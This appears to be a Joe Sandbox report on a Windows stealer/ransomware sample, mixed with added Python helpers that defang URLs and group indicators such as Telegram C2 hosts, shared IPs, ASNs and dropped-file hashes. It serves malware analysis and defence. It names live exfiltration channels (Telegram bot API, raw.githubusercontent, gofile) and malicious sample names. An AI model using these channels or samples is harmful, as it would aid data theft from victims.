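    """Make a URL or host unclickable for sharing: leading http -> hxxp, . -> [.]"""
    return re.sub(r"^http", "hxxp", text).replace(".", "[.]")


def parse_url_row(row):
    """Split one fused URL-table row into url, host, sources and malicious flag."""
    m = SOURCE_START.search(row)
    if m is None or not row.endswith(("true", "false")):
        raise ValueError("not a URL-table row: " + row)
    url, rest = row[:m.start()], row[m.start():]
    flag = "true" if rest.endswith("true") else "false"
    sources = []
    for tok in rest[:-len(flag)].split(", "):
        if tok.endswith(".sdmp") and sources:
            sources[-1] += ", " + tok  # a memory dump belongs to the process named before it
        else:
            sources.append(tok)
    return {"url": url, "host": urlsplit(url).hostname, "sources": sources,
            "malicious": flag == "true"}


def parse_ip_row(ip, domain_country, asn_line):
    """Split the fused domain/country and ASN/name/malicious cells of an IP-table row."""
    dm = re.fullmatch(r"([a-z0-9.-]+)(.*)", domain_country)
    am = re.fullmatch(r"(\d+)(.*?)(true|false)", asn_line)
    if dm is None or am is None:
        raise ValueError("not an IP-table row: %s %s" % (domain_country, asn_line))
    return {"ip": ip, "domain": dm.group(1), "country": dm.group(2), "asn": am.group(1),
            "asn_name": am.group(2), "malicious": am.group(3) == "true"}


def telegram_token(url):
    """Return (bot_id, secret) if the URL carries a Telegram bot token, else None."""
    m = TELEGRAM_TOKEN.search(url)
    return (m.group(1), m.group(2)) if m else None


def build_ioc_set(url_rows, ip_rows):
    """Group defanged hosts by role and attach the resolved IP/ASN from the IP table."""
    resolved = {r["domain"]: r for r in (parse_ip_row(*t) for t in ip_rows)}
    iocs = defaultdict(dict)
    for row in url_rows:
        rec = parse_url_row(row)
        host = rec["host"]
        entry = iocs[HOST_ROLES.get(host, "unclassified")].setdefault(
            defang(host), {"urls": set(), "seen_in": set(), "ips": [], "asn": None})
        entry["urls"].add(defang(rec["url"]))
        entry["seen_in"].update(s.split(",")[0] for s in rec["sources"])
        if rec["malicious"] or (host in resolved and resolved[host]["malicious"]):
            entry["flagged_by_sandbox"] = True
        if host in resolved:
            entry["ips"] = [resolved[host]["ip"]]
            entry["asn"] = resolved[host]["asn"] + " " + resolved[host]["asn_name"]
        token = telegram_token(rec["url"])
        if token:
            entry["telegram_bot_id"] = token[0]  # the secret half stays in the URL only
    return iocs


if __name__ == "__main__":
    for role, hosts in sorted(build_ioc_set(URL_ROWS, IP_ROWS).items()):
        print(role)
        for host, e in sorted(hosts.items()):
            print("  %-30s ips=%s asn=%s seen_in=%s" % (host, e["ips"], e["asn"], sorted(e["seen_in"])))
```

Run it as a script to print the grouped set. The Reputation column is deliberately ignored: "high" there is the reputation of the domain (github.com, ecosia.org, support.office.com), not a verdict on what the sample does with it, which is why the Telegram sendMessage URL sits at "high" while being the configured C2. The ip-score.com and icanhazip.com calls only reveal the victim's public address; they are useful as a behavioural signal but poor blocklist material on their own, since legitimate software queries the same services.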
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1565141
Start date and time: 2024-11-29 10:56:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: LKxcbzlwkz.exe (renamed because the original name is a hash value)
Original Sample Name: 02c5585c0346b9f7632691c41bb5741b8ab7b0f785e707ae65e918633bb5b801.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.evad.winEXE@35/91@10/8
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 81%
• Number of executed functions: 76
                                                                                                                                                                                                                  • Number of non-executed functions: 283
                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                  • Execution Graph export aborted for target JOUNLV.exe, PID 4828 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: LKxcbzlwkz.exe
Time | Type | Description
04:57:08 | API Interceptor | 199x Sleep call for process: JOUNLV.exe modified
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | nYkkZZbAIR.exe | malicious | Stealerium |
149.154.167.220 | MICROCHIP QFP3 22 - 25000.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | AWB8674109965.html | malicious | HTMLPhisher |
149.154.167.220 | INQUIRY_pdf.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
149.154.167.220 | RECEIPT DATED 28.11.2024,pdf.exe | malicious | Snake Keylogger |
149.154.167.220 | drawing 10023. spec T4 300W .... dimn 560horsepower po 1198624 _ %00% spec .exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
149.154.167.220 | t1gY0BGmOZ.jar | malicious | Can Stealer |
149.154.167.220 | 1C24TBP_00000143.pdf.exe | malicious | AgentTesla |
149.154.167.220 | QUOTATION_AUGQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger |
104.16.184.241 | 9fGsCDYKLV.exe | malicious | Flesh Stealer | icanhazip.com/
104.16.184.241 | file.exe | malicious | Flesh Stealer | icanhazip.com/
104.16.184.241 | vbe11TPn2x.exe | malicious | Flesh Stealer | icanhazip.com/
104.16.184.241 | zufmUwylvo.exe | malicious | Flesh Stealer, Xmrig | icanhazip.com/
104.16.184.241 | gGcpYEOr8U.exe | malicious | Unknown | icanhazip.com/
104.16.184.241 | GsZkXAmf61.exe | malicious | Celestial Rat | icanhazip.com/
104.16.184.241 | mitec_purchase_order_PDF (1).vbs | malicious | PXRECVOWEIWOEI Stealer | icanhazip.com/
104.16.184.241 | Purchase Order.js | malicious | PXRECVOWEIWOEI Stealer, PureLog Stealer | icanhazip.com/
104.16.184.241 | DbwdFVTAXI.exe | malicious | PXRECVOWEIWOEI Stealer | icanhazip.com/
104.16.184.241 | 4b8lIXw22G.exe | malicious | PXRECVOWEIWOEI Stealer | icanhazip.com/
45.112.123.126 | t1gY0BGmOZ.jar | malicious | Can Stealer |
45.112.123.126 | t1gY0BGmOZ.jar | malicious | Can Stealer |
45.112.123.126 | MayitaV16.exe | malicious | Unknown |
45.112.123.126 | bZPAo2e2Pv.jar | malicious | Can Stealer |
45.112.123.126 | bZPAo2e2Pv.jar | malicious | Can Stealer |
45.112.123.126 | iDvmIRCPBw.exe | malicious | Unknown |
45.112.123.126 | ZdXUGLQpoL.exe | malicious | Unknown |
45.112.123.126 | jaPB8q3WL1.exe | malicious | Unknown |
45.112.123.126 | yx7VCK1nxU.exe | malicious | Unknown |
45.112.123.126 | RuntimeusererVers.exe | malicious | Python Stealer |
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context (resolved IP)
ip-score.com | SKEGWY.exe | malicious | Unknown | 188.138.68.212
raw.githubusercontent.com | CCuITQzvd4.exe | malicious | Unknown | 185.199.108.133
raw.githubusercontent.com | dMFmJxq6oK.exe | malicious | Unknown | 185.199.109.133
raw.githubusercontent.com | nYkkZZbAIR.exe | malicious | Stealerium | 185.199.110.133
raw.githubusercontent.com | Job Description.lnk.download.lnk | malicious | RDPWrap Tool, Ducktail | 185.199.110.133
raw.githubusercontent.com | CORREIO BCV.zip.html | malicious | Unknown | 185.199.111.133
raw.githubusercontent.com | document.vbs | malicious | Unknown | 185.199.111.133
raw.githubusercontent.com | ZipRipper.cmd | malicious | Unknown | 185.199.108.133
raw.githubusercontent.com | gr5zS9wytq.bat | malicious | Unknown | 185.199.111.133
raw.githubusercontent.com | gr5zS9wytq.bat | malicious | Unknown | 185.199.110.133
raw.githubusercontent.com | based.exe | malicious | DCRat, PureLog Stealer, Xmrig, zgRAT | 185.199.110.133
api.telegram.org | nYkkZZbAIR.exe | malicious | Stealerium | 149.154.167.220
api.telegram.org | MICROCHIP QFP3 22 - 25000.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | AWB8674109965.html | malicious | HTMLPhisher | 149.154.167.220
api.telegram.org | INQUIRY_pdf.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | RECEIPT DATED 28.11.2024,pdf.exe | malicious | Snake Keylogger | 149.154.167.220
api.telegram.org | drawing 10023. spec T4 300W .... dimn 560horsepower po 1198624 _ %00% spec .exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | t1gY0BGmOZ.jar | malicious | Can Stealer | 149.154.167.220
api.telegram.org | 1C24TBP_00000143.pdf.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | QUOTATION_AUGQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
store6.gofile.io | SecuriteInfo.com.Trojan.DownLoader45.55850.18837.22068.exe | malicious | Unknown | 136.175.8.205
store6.gofile.io | Clylm.exe | malicious | Clipboard Hijacker | 136.175.8.205
store6.gofile.io | C4PROloader.exe | malicious | Clipboard Hijacker | 136.175.8.205
store6.gofile.io | SecuriteInfo.com.Trojan.DownLoader45.55850.31523.3941.exe | malicious | Unknown | 136.175.8.205
store6.gofile.io | build.exe | malicious | Clipboard Hijacker, Stealerium | 136.175.8.205
                                                                                                                                                                                                                                                          • 31.14.70.246
                                                                                                                                                                                                                                                          SecuriteInfo.com.Win64.Evo-gen.1195.20229.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 31.14.70.246
                                                                                                                                                                                                                                                          4b7af02af4ab2601c9006b3734bce41adf72f4f212765.exeGet hashmaliciousAmadey, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                                                          • 31.14.70.246
                                                                                                                                                                                                                                                          g0Cm482vVa.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                                                                                                                          • 31.14.70.246
                                                                                                                                                                                                                                                          Roblox Hack.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                          • 31.14.70.246
                                                                                                                                                                                                                                                          Synapse X.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                          • 31.14.70.246
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | nYkkZZbAIR.exe | malicious | Stealerium | 149.154.167.220
TELEGRAMRU | MICROCHIP QFP3 22 - 25000.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
TELEGRAMRU | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar | 149.154.167.99
TELEGRAMRU | file.exe | malicious | Vidar | 149.154.167.99
TELEGRAMRU | AWB8674109965.html | malicious | HTMLPhisher | 149.154.167.220
TELEGRAMRU | INQUIRY_pdf.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | RECEIPT DATED 28.11.2024,pdf.exe | malicious | Snake Keylogger | 149.154.167.220
TELEGRAMRU | drawing 10023. spec T4 300W .... dimn 560horsepower po 1198624 _ %00% spec .exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | t1gY0BGmOZ.jar | malicious | Can Stealer | 149.154.167.220
CLOUDFLARENETUS | CCuITQzvd4.exe | malicious | Unknown | 104.26.1.5
CLOUDFLARENETUS | dMFmJxq6oK.exe | malicious | Unknown | 104.26.1.5
CLOUDFLARENETUS | qAyJeM1rqk.exe | malicious | LummaC | 172.67.160.80
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 104.21.16.9
CLOUDFLARENETUS | You have received a gift from Giftano.eml | malicious | GiftCardfraud | 104.17.25.14
CLOUDFLARENETUS | PAYMENT_ADVICE.exe | malicious | FormBook | 104.21.24.198
CLOUDFLARENETUS | MICROCHIP QFP3 22 - 25000.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
CLOUDFLARENETUS | JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exe | malicious | GuLoader, Snake Keylogger | 104.21.67.152
CLOUDFLARENETUS | kingsmaker_4.ca.ps1 | malicious | Ducktail | 172.67.179.67
CLOUDFLARENETUS | specifications.exe | malicious | FormBook, PureLog Stealer | 104.21.90.137
AMAZON-AESUS | file.exe | malicious | Clipboard Hijacker, Cryptbot | 18.213.123.165
AMAZON-AESUS | file.exe | malicious | Clipboard Hijacker, Cryptbot | 18.208.8.205
AMAZON-AESUS | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc | 18.208.8.205
AMAZON-AESUS | loligang.arm.elf | malicious | Mirai | 44.219.138.3
AMAZON-AESUS | kingsmaker_4.ca.ps1 | malicious | Ducktail | 52.6.155.20
AMAZON-AESUS | kingsmaker_6.ca.ps1 | malicious | Ducktail | 52.6.155.20
AMAZON-AESUS | Job Description.lnk (2).download.lnk | malicious | Ducktail | 50.16.47.176
AMAZON-AESUS | Company Booklet.lnk (2).download.lnk | malicious | Ducktail | 3.233.129.217
AMAZON-AESUS | Job Description.lnk.download.lnk | malicious | Ducktail | 3.219.243.226
AMAZON-AESUS | file.exe | malicious | Clipboard Hijacker, Cryptbot | 18.208.8.205
AMAZON-02US | loligang.sh4.elf | malicious | Mirai | 99.78.142.235
AMAZON-02US | You have received a gift from Giftano.eml | malicious | GiftCardfraud | 76.223.125.47
AMAZON-02US | PAYMENT_ADVICE.exe | malicious | FormBook | 13.248.169.48
AMAZON-02US | sora.i686.elf | malicious | Unknown | 54.171.230.55
AMAZON-02US | loligang.spc.elf | malicious | Mirai | 18.236.149.213
AMAZON-02US | loligang.mips.elf | malicious | Mirai | 100.23.80.86
AMAZON-02US | loligang.ppc.elf | malicious | Mirai | 44.235.121.154
AMAZON-02US | loligang.arm5.elf | malicious | Mirai | 54.217.10.153
AMAZON-02US | loligang.arm7.elf | malicious | Mirai | 18.219.202.31
AMAZON-02US | https://www.haysbohelpdesk-dach.net/WorkOrder.do?woMode=newWO&from=Templates&module=incident&reqTemplate=5403 | malicious | Unknown | 44.237.131.128
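Added example, not part of the Joe Sandbox report: a small Python parser that reads context rows transcribed into a pipe-delimited form (Match | Associated Sample Name / URL | Detection | Threat Name | Context) and reports which IPs appear with more than one malware family. The embedded input is constructed from rows of this report's ASN table; the pipe layout, the `min_families` threshold and the decision to ignore "Unknown" as a family are my choices, not Joe Sandbox's. The point it makes: 149.154.167.220 sits in the TELEGRAMRU ASN (Telegram's API, which several of the families listed here use as an exfiltration channel), and the Cloudflare and Amazon addresses are CDN and cloud edges, so these IPs identify a channel, not an actor, and are weak block-list entries on their own.

```python
"""Added example (not part of the Joe Sandbox report): parse a context table
transcribed as pipe-delimited rows and find IPs shared by several families.

Assumed row layout (my transcription of the report's table, not Joe Sandbox's
export format):
    Match | Associated Sample Name / URL | Detection | Threat Name | Context
"""
import re
from collections import defaultdict

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed input: eight rows copied from this report's ASN context table.
SAMPLE_TABLE = """\
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | nYkkZZbAIR.exe | malicious | Stealerium | 149.154.167.220
TELEGRAMRU | MICROCHIP QFP3 22 - 25000.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | file.exe | malicious | Vidar | 149.154.167.99
CLOUDFLARENETUS | qAyJeM1rqk.exe | malicious | LummaC | 172.67.160.80
CLOUDFLARENETUS | MICROCHIP QFP3 22 - 25000.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
CLOUDFLARENETUS | JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exe | malicious | GuLoader, Snake Keylogger | 104.21.67.152
AMAZON-AESUS | file.exe | malicious | Clipboard Hijacker, Cryptbot | 18.208.8.205
AMAZON-AESUS | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc | 18.208.8.205
"""


def parse_context_table(text):
    """Return one dict per data row; raise ValueError on a malformed row."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    if not lines:
        raise ValueError("empty table")
    header = [h.strip() for h in lines[0].split("|")]
    rows = []
    for line in lines[1:]:
        cells = [c.strip() for c in line.split("|")]
        if len(cells) != len(header):
            raise ValueError(f"malformed row: {line!r}")
        row = dict(zip(header, cells))
        # "Threat Name" is a comma-separated list; "Unknown" is a placeholder,
        # not a family, so it is dropped here (my choice).
        row["families"] = [f.strip() for f in row["Threat Name"].split(",")
                           if f.strip() and f.strip() != "Unknown"]
        # Context holds one IP or several (the JA3 table lists five per row).
        row["ips"] = IPV4.findall(row["Context"])
        rows.append(row)
    return rows


def families_by_ip(rows):
    """Map each context IP to the sorted list of families seen with it."""
    seen = defaultdict(set)
    for row in rows:
        for ip in row["ips"]:
            seen[ip].update(row["families"])
    return {ip: sorted(fams) for ip, fams in seen.items()}


def shared_infrastructure(rows, min_families=2):
    """IPs observed with at least min_families distinct families.

    Such addresses are shared services (Telegram's API, CDN edges, cloud
    hosting) rather than actor-owned C2: on their own they identify a
    channel, not an intrusion set. Pair them with the sample hash or the
    JA3 fingerprint before turning them into a detection.
    """
    return {ip: fams for ip, fams in families_by_ip(rows).items()
            if len(fams) >= min_families}


def asn_for_ip(rows):
    """Map each IP to its Match cell (the ASN name in SAMPLE_TABLE)."""
    return {ip: row["Match"] for row in rows for ip in row["ips"] if row["Match"]}


if __name__ == "__main__":
    parsed = parse_context_table(SAMPLE_TABLE)
    asn = asn_for_ip(parsed)
    for ip, fams in sorted(shared_infrastructure(parsed).items()):
        print(f"{ip:16} {asn.get(ip, '?'):16} shared by {', '.join(fams)}")
```

Run as-is it lists 149.154.167.220 (TELEGRAMRU), 104.21.67.152 (CLOUDFLARENETUS) and 18.208.8.205 (AMAZON-AESUS) as shared; 149.154.167.99 and 172.67.160.80 are each tied to a single family in the constructed subset and are not flagged. Feeding the full tables from this report to the same functions is the intended use.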
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | nYkkZZbAIR.exe | malicious | Stealerium | 149.154.167.220, 45.112.123.126, 50.17.0.11, 31.14.70.249, 185.199.110.133
3b5074b1b5d032e5620f69f9f700ff0e | https://theoggroup-my.sharepoint.com/:u:/g/personal/rohit_theoggroup_co/EW1S6u7eBPZAkl8sn76CFW4B9_fhjfgaN299JnYAgaQ9MQ?e=CXhREy&xsdata=MDV8MDJ8RGVib3JhaC5DbGFya0BtcGZ0Lm5ocy51a3w5NDRiZjU4NDRlNTk0NmZlNWNlNTA4ZGQwZmI5NDMxMnxjMzdkNjM1N2M4OGI0MjZiYjY4MGRmODE2NmE4NmVkN3wwfDB8NjM4Njg0MDEwNTcwNTEwNzIwfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXwwfHx8&sdata=MHA0b3IvdkFFTytKRVJ3WGJUSzFiaW1jbm16a2hNNURVamQwbGRiNFB6RT0%3d | malicious | Unknown | 149.154.167.220, 45.112.123.126, 50.17.0.11, 31.14.70.249, 185.199.110.133
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | LummaC Stealer | 149.154.167.220, 45.112.123.126, 50.17.0.11, 31.14.70.249
                                                                                                                                                                                                                                                          • 185.199.110.133
                                                                                                                                                                                                                                                          Payment_Advice_HSBC_Swift_Copy.pdf.lnkGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          • 45.112.123.126
                                                                                                                                                                                                                                                          • 50.17.0.11
                                                                                                                                                                                                                                                          • 31.14.70.249
                                                                                                                                                                                                                                                          • 185.199.110.133
                                                                                                                                                                                                                                                          11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          • 45.112.123.126
                                                                                                                                                                                                                                                          • 50.17.0.11
                                                                                                                                                                                                                                                          • 31.14.70.249
                                                                                                                                                                                                                                                          • 185.199.110.133
                                                                                                                                                                                                                                                          INV_642421346_50136253995_SIMPLE_SK#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          • 45.112.123.126
                                                                                                                                                                                                                                                          • 50.17.0.11
                                                                                                                                                                                                                                                          • 31.14.70.249
                                                                                                                                                                                                                                                          • 185.199.110.133
                                                                                                                                                                                                                                                          30180908_signed#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          • 45.112.123.126
                                                                                                                                                                                                                                                          • 50.17.0.11
                                                                                                                                                                                                                                                          • 31.14.70.249
                                                                                                                                                                                                                                                          • 185.199.110.133
                                                                                                                                                                                                                                                          #U017dIADOS#U0164 O ROZPO#U010cET 28.11.2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          • 45.112.123.126
                                                                                                                                                                                                                                                          • 50.17.0.11
                                                                                                                                                                                                                                                          • 31.14.70.249
                                                                                                                                                                                                                                                          • 185.199.110.133
                                                                                                                                                                                                                                                          MICROCHIP QFP3 22 - 25000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          • 45.112.123.126
                                                                                                                                                                                                                                                          • 50.17.0.11
                                                                                                                                                                                                                                                          • 31.14.70.249
                                                                                                                                                                                                                                                          • 185.199.110.133
                                                                                                                                                                                                                                                          Order Ref SO14074.pdf.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          • 45.112.123.126
                                                                                                                                                                                                                                                          • 50.17.0.11
                                                                                                                                                                                                                                                          • 31.14.70.249
                                                                                                                                                                                                                                                          • 185.199.110.133
                                                                                                                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19CCuITQzvd4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 188.138.68.212
                                                                                                                                                                                                                                                          dMFmJxq6oK.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 188.138.68.212
                                                                                                                                                                                                                                                          11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                          • 188.138.68.212
                                                                                                                                                                                                                                                          INV_642421346_50136253995_SIMPLE_SK#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                          • 188.138.68.212
                                                                                                                                                                                                                                                          30180908_signed#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                          • 188.138.68.212
                                                                                                                                                                                                                                                          #U017dIADOS#U0164 O ROZPO#U010cET 28.11.2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                          • 188.138.68.212
                                                                                                                                                                                                                                                          JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                          • 188.138.68.212
                                                                                                                                                                                                                                                          rjustificantePago_es_5678021862895.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                                          • 188.138.68.212
                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                                                                                                                                                                          • 188.138.68.212
                                                                                                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                          • 188.138.68.212
No context
Process: C:\Users\user\Desktop\LKxcbzlwkz.exe
File Type: HTML document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 169
Entropy (8bit): 4.51013352720184
Encrypted: false
SSDEEP: 3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLPbAdTwcWWGu:q43tISl6kXiMIWSU6XlI5LPepfGu
MD5: 61DA15462A5DC94FE3E228F03D6D6F9E
SHA1: 198371E24132816E094BA201DE343B3F087E83E9
SHA-256: 74CBC7E9766E9B64D2352633ECE3ABB004CBFA6826CD999F9FEC142E7D294B2F
SHA-512: C63C80ECD7BE230741DC0474C7C7FE3F8DF5201320F96DED8AA12C2E0AC166A6EAE31561DF4C500E2027DCC5144B6D7691E7EBD6EF327224DEEE5DB5C090D2DB
Malicious: false
Preview: <html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.19.1</center>..</body>..</html>..
Process: C:\Users\user\Desktop\LKxcbzlwkz.exe
File Type: HTML document, ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 169
Entropy (8bit): 4.51013352720184
Encrypted: false
SSDEEP: 3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLPbAdTwcWWGu:q43tISl6kXiMIWSU6XlI5LPepfGu
MD5: 61DA15462A5DC94FE3E228F03D6D6F9E
SHA1: 198371E24132816E094BA201DE343B3F087E83E9
SHA-256: 74CBC7E9766E9B64D2352633ECE3ABB004CBFA6826CD999F9FEC142E7D294B2F
SHA-512: C63C80ECD7BE230741DC0474C7C7FE3F8DF5201320F96DED8AA12C2E0AC166A6EAE31561DF4C500E2027DCC5144B6D7691E7EBD6EF327224DEEE5DB5C090D2DB
Malicious: false
Preview: <html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.19.1</center>..</body>..</html>..
Process: C:\Users\user\Desktop\LKxcbzlwkz.exe
File Type: HTML document, ASCII text, with very long lines (845)
Category: dropped
Size (bytes): 1865
Entropy (8bit): 5.186858751840116
Encrypted: false
SSDEEP: 48:nUSZlRZh7ZWPK2c9VUI0wZBJmb73I46bsJHN6Yn7DHL1RX0g9uoV:nUSZlRZdZEK2cjcb73zbL6Yn7LRks
MD5: 0ABFFF5C8908F6469A29072D504D1E28
SHA1: 3B81CF92575E381E575DDEAF3CC895480286A43F
SHA-256: C6E676F721EAD81D2AA39F3AD6BDC8E9C4C78CDDAB51912CF4348FAB9E87D586
SHA-512: 421239DD73F471E385FC74A4AF27241DA9E481BAB7A984F5E6D28249FD49287539540FF84F954616F4CE68538CC935D1F1DB28B0B5F0AC1E3FAA74420F416F9B
Malicious: false
Preview: <!DOCTYPE html><html lang=""><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><link rel="icon" sizes="16x16" href="/img/favicon-16.png"><link rel="icon" sizes="32x32" href="/img/favicon-32.png"><link rel="icon" sizes="96x96" href="/img/favicon-96.png"><link rel="icon" sizes="196x196" href="/img/favicon-196.png"><title>Check your IP address in system anti fraud detections, detecting real location</title><meta name="Description" content="On our site you can find all the information you may obtain affordable ways of your IP address, system and location, as do systems for the detection of fraud. As you can see how safe you hide your real IP address"><script>(function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)};. m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)}). (window, document,
Process: C:\Users\user\Desktop\LKxcbzlwkz.exe
File Type: DOS batch file, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 5070
Entropy (8bit): 5.272843360717248
Encrypted: false
SSDEEP: 96:vflVf/1VfYpVf/Q7VfaVfNVfMVfspVfs/VfsHVf7ZVfsVVfSMjF:vfDf/TfMf/kf8fLfmfsvfsNfs1fbfszL
                                                                                                                                                                                                                                                          MD5:12CA45D6A6BF7C0BED076701DF7875A7
                                                                                                                                                                                                                                                          SHA1:0C24440FBF3C13A3229C285D8F4E8C429F6AE784
                                                                                                                                                                                                                                                          SHA-256:ABED5C6D862517E96862DBFC75730229DD36497E06883167EC567E69B613671B
